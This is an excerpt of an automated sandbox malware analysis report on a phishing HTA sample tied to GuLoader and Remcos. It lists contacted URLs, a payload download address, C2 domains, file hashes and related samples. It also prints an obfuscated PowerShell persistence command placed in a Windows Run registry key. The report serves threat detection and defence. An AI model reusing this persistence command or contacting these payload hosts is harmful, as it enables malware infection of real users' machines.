                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                		high
                                                https://contoso.com/powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://login.yahoo.com/config/loginwab.exefalse
                                                    		high
                                                    http://www.nirsoft.net/wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://www.imvu.comatawab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin/uwab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://geoplugin.net/json.gp_wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://geoplugin.net/json.gprqDSwab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://geoplugin.net/json.gpgwab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icowab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                            		high
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmptrue
                                                            • URL Reputation: malware
                                                            		unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.imvu.comwab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/Iconpowershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://87.121.105.163powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binCuwab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                                  		high
                                                                  http://crl.ver)svchost.exe, 00000003.00000002.3226864730.0000021BB3E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  https://www.ecosia.org/newtab/wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                                    		high
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ac.ecosia.org/autocomplete?q=wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                                        		high
                                                                        http://87.121.108powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		low
                                                                        https://g.live.com/odclientsettings/Prod/C:edb.log.3.drfalse
                                                                          		high
                                                                          http://geoplugin.net/wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.google.com/accounts/serviceloginwab.exefalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                                              		high
                                                                              http://www.ebuddy.comwab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              142.250.80.100
                                                                              		www.google.comUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              45.88.90.110
                                                                              		jgbours284hawara02.duckdns.orgBulgaria
                                                                              		10753LVLT-10753UStrue
                                                                              239.255.255.250
                                                                              		unknownReserved
                                                                              		unknownunknownfalse
                                                                              87.121.105.163
                                                                              		unknownBulgaria
                                                                              		43561NET1-ASBGfalse
                                                                              178.237.33.50
                                                                              		geoplugin.netNetherlands
                                                                              		8455ATOM86-ASATOM86NLfalse
                                                                              192.169.69.26
                                                                              		jgbours284hawara01.duckdns.orgUnited States
                                                                              		23033WOWUStrue

                                                                              Private

                                                                              IP
                                                                              192.168.2.5
                                                                              127.0.0.1

                                                                              General Information

                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                              Analysis ID:1435041
                                                                              Start date and time:2024-05-02 01:13:17 +02:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 7m 54s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:23
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:PLOCMR-002 Dane dotyczce dokumentw i towarw.hta
                                                                              Detection:MAL
                                                                              Classification:mal100.phis.troj.spyw.evad.winHTA@46/25@7/8
                                                                              EGA Information:
                                                                              • Successful, ratio: 80%
                                                                              HCA Information:
                                                                              • Successful, ratio: 99%
                                                                              • Number of executed functions: 165
                                                                              • Number of non-executed functions: 329
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .hta

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                              • Excluded IPs from analysis (whitelisted): 23.51.58.94, 142.250.65.227, 142.250.65.206, 172.253.115.84, 34.104.35.123, 23.44.201.207, 23.44.201.211, 192.229.211.108, 142.251.40.163, 142.250.65.174
                                                                              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                              • Execution Graph export aborted for target powershell.exe, PID 3748 because it is empty
                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • VT rate limit hit for: PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              01:14:03API Interceptor2x Sleep call for process: svchost.exe modified
                                                                              01:14:03API Interceptor89x Sleep call for process: powershell.exe modified
                                                                              01:14:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Straddlers %Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)
                                                                              01:15:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Straddlers %Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)
                                                                              01:15:36API Interceptor159x Sleep call for process: wab.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              239.255.255.250https://nthturn.com/Get hashmaliciousUnknownBrowse
                                                                                undelivered Messages.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                  https://bshgjc.com/Get hashmaliciousUnknownBrowse
                                                                                    https://smithlakervresort.com/Get hashmaliciousUnknownBrowse
                                                                                      https://juclouds.com/Get hashmaliciousUnknownBrowse
                                                                                        file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          https://www.jmwbpns.cn/Get hashmaliciousUnknownBrowse
                                                                                            https://www.uhnrya.cn/Get hashmaliciousUnknownBrowse
                                                                                              https://cybershieldfortress.buzz/avs/en/dt/mca-4-no5.php?Get hashmaliciousUnknownBrowse
                                                                                                Benefits.docxGet hashmaliciousUnknownBrowse
                                                                                                  87.121.105.163doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                  • 87.121.105.163/Sylvester.dwp
                                                                                                  PO_La-Tannerie04180240418.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 87.121.105.163/tWVvmOpHE254.bin
                                                                                                  LUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                  • 87.121.105.163/tossers.psp
                                                                                                  rCW_00402902400429.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 87.121.105.163/Aviarists.aca
                                                                                                  CDS AC 661171855-VN1 SOA.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 87.121.105.163/AKaUDBTG140.bin
                                                                                                  DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                  • 87.121.105.163/PUzAKuQ35.bin
                                                                                                  PO_La-Tanerie04180240124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                  • 87.121.105.163/YSnpkrCwWalJFSpN146.bin
                                                                                                  FTG_PD_04024024001.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 87.121.105.163/EYioOXUtWs45.bin
                                                                                                  Doc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 87.121.105.163/TjtonPwEiP175.bin
                                                                                                  Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 87.121.105.163/icjFpYDkBweqyeZ252.bin
                                                                                                  45.88.90.110doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                    DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                      BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                        HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                          rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                            PonudaSKMTBH365756867868855766786686.vbsGet hashmaliciousGuLoader, RemcosBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              jgbours284hawara01.duckdns.orgLUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 192.169.69.26
                                                                                                              DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                              • 45.88.90.110
                                                                                                              BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 45.88.90.110
                                                                                                              HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 45.88.90.110
                                                                                                              rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 45.88.90.110
                                                                                                              PonudaSKMTBH365756867868855766786686.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 45.88.90.110
                                                                                                              jgbours284hawara02.duckdns.orgdoc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 45.88.90.110
                                                                                                              geoplugin.netnU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              .04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 178.237.33.50

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              NET1-ASBG831107010C8578AD95A12C5498B03755EAC398B5BBC0D.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                              • 94.156.8.188
                                                                                                              installerwn.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                              • 94.156.8.189
                                                                                                              Dy4Oz8C1yF.exeGet hashmaliciousQuasarBrowse
                                                                                                              • 93.123.85.108
                                                                                                              MOdSyP5G8y.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 93.123.85.108
                                                                                                              KG8KxoD6n4.exeGet hashmaliciousQuasarBrowse
                                                                                                              • 93.123.85.108
                                                                                                              twkBksZzkc.exeGet hashmaliciousQuasarBrowse
                                                                                                              • 93.123.85.108
                                                                                                              6zSXI3q30p.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 93.123.85.108
                                                                                                              Purchase.pif.exeGet hashmaliciousGuLoaderBrowse
                                                                                                              • 94.156.79.214
                                                                                                              pWftP6smaX.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 94.156.8.76
                                                                                                              7AviWAaJMa.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 94.156.8.76
                                                                                                              LVLT-10753USdoc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 45.88.90.110
                                                                                                              957URl9ErB.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                              • 45.88.90.160
                                                                                                              57O67GbOCj.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 94.154.174.111
                                                                                                              x1b5bmJgLm.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 153.13.37.94
                                                                                                              fbW42zYly3.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 206.165.107.221
                                                                                                              NBcTP7MyXM.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 45.88.90.17
                                                                                                              SBZG0flucJ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 45.88.90.17
                                                                                                              Sl8HmMfNnr.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 45.88.90.17
                                                                                                              50eBWGCFKc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 45.88.90.17
                                                                                                              BOVjnkqU4W.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 45.88.90.17
                                                                                                              WOWUSdocumento.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 192.169.69.26
                                                                                                              LUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 192.169.69.26
                                                                                                              https://pub-68c8c7ae0a9b4e62b5641da4fe04590d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 192.169.69.26
                                                                                                              https://svuch3d.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.169.69.26
                                                                                                              https://6mw23o.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.169.69.26
                                                                                                              https://ixkv5pf.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.169.69.26
                                                                                                              87tBuE42ft.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                              • 172.93.222.219
                                                                                                              VbVGKkKgdbEScfW.scrGet hashmaliciousNanocore, PureLog StealerBrowse
                                                                                                              • 192.169.69.26
                                                                                                              dxM4ij1KkuoBK3H.scrGet hashmaliciousNanocoreBrowse
                                                                                                              • 192.169.69.26
                                                                                                              Q00D5u1xHq.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 208.115.121.80
                                                                                                              ATOM86-ASATOM86NLhttps://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              1138de370e523e824bbca92d049a3777https://juclouds.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                              • 23.1.237.91
                                                                                                              https://wywljs.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              https://www.soqsrkk.cn/Get hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              Transmitted.jarGet hashmaliciousDynamic StealerBrowse
                                                                                                              • 23.1.237.91
                                                                                                              https://us-tommybahama.shop/collections/men-shirts/products/barbados-breeze-beach-bloom-stretch-linen-shirt?data_from=collection_detail%20us-tommybahama.shopGet hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              tZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                              • 23.1.237.91
                                                                                                              mbROg6u6if.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              https://github.com/ytisf/theZoo/blob/master/malware/Binaries/Artemis/Artemis.sha256Get hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              cZOa7Yhm9e.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              28a2c9bd18a11de089ef85a160da29e4undelivered Messages.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://smithlakervresort.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://www.jmwbpns.cn/Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://www.uhnrya.cn/Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://cybershieldfortress.buzz/avs/en/dt/mca-4-no5.php?Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              Benefits.docxGet hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://wywljs.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://xdywna.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://portal.cpscompressors.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 20.12.23.50

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310720
                                                                                                              Entropy (8bit):0.8512803232926602
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug/:gJjJGtpTq2yv1AuNZRY3diu8iBVqF6
                                                                                                              MD5:0E504186EFB11EE97CFBCF0F17FD51FD
                                                                                                              SHA1:E62C43AE495ADF7DB458B24A8F5D2DAD16FCCD7B
                                                                                                              SHA-256:F6B251FF72AFBC3601B3FAFE8F3FB0551A633087BE4766A95C9DE2DF1029E83A
                                                                                                              SHA-512:13BCE4CE01C3D061C584550A52BEBED920B53CD5C3C6D8CEA745DA2AC250FF94BD59A62562C6FB90FF9C57EBDFA9102E60159F3CEAC96AAC8EE0134DDE05B69E
                                                                                                              Malicious:false
                                                                                                              Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x4e16ba81, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310720
                                                                                                              Entropy (8bit):0.6585794120446483
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:ZSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Zaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                              MD5:A3C83519CABDD3EB4C183CF6869A68AA
                                                                                                              SHA1:F192BE25916AC087A58B3C4365406E9A0AE5CE56
                                                                                                              SHA-256:B8AF947E0B43F34FEC0359F9E76865E2BD392A5BD25BED6FADBF8CAEBDFD28EB
                                                                                                              SHA-512:C9BA0CEF6880D595EDA510F9CA04205560C25A62994175291D9BCE85C768CF3AE61C1805772DD761E2AD3B9BD349E5146767168C81C5D38F7341C73158BD9EB9
                                                                                                              Malicious:false
                                                                                                              Preview:N...... ...............X\...;...{......................0.z..........{.......|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................l.......|....................o......|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16384
                                                                                                              Entropy (8bit):0.08096041285605929
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:pg/ltKYeRm3qfVGuAJkhvekl1Aa+HallrekGltll/SPj:8XKzR42rxlaMJe3l
                                                                                                              MD5:8F8C18168585BD3BAF4C0C31E20736F0
                                                                                                              SHA1:328B3558FDEED19B2F354A1A878CD80252B953EB
                                                                                                              SHA-256:EE06EAB3C7563B77E8A48E1562950C9ADB68EA88B342C34546DBF528A76F9EF0
                                                                                                              SHA-512:EED3F920A1177F328085364AA99AA45900557F4A2673C8A999C894C96021FA34C4D3FA3FCF1D309C4B150699B054CA17859CB1B50A613C14C5CC8B7813DC326E
                                                                                                              Malicious:false
                                                                                                              Preview:..Eg.....................................;...{.......|.......{...............{.......{...XL......{....................o......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):965
                                                                                                              Entropy (8bit):5.02359004946268
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:tkhXkmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qhXldVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                              MD5:A82488501536043ACF922C4D91246D09
                                                                                                              SHA1:BCA9EF44B47567D62A94F2ED6A79491575544D06
                                                                                                              SHA-256:47F1D58A3F31240D1EAE84F8585B4AFFA9ECE1EDF5FFB39631431954E1B39D5E
                                                                                                              SHA-512:30F80522E14B7AC59FB4D260D8C36A3FB88CCF29B7E279F34A493F94B59CF1EC0951205E33A1E81631AD8C682CF8831BC185E224A43A87BB52CB0C0D7080DB50
                                                                                                              Malicious:false
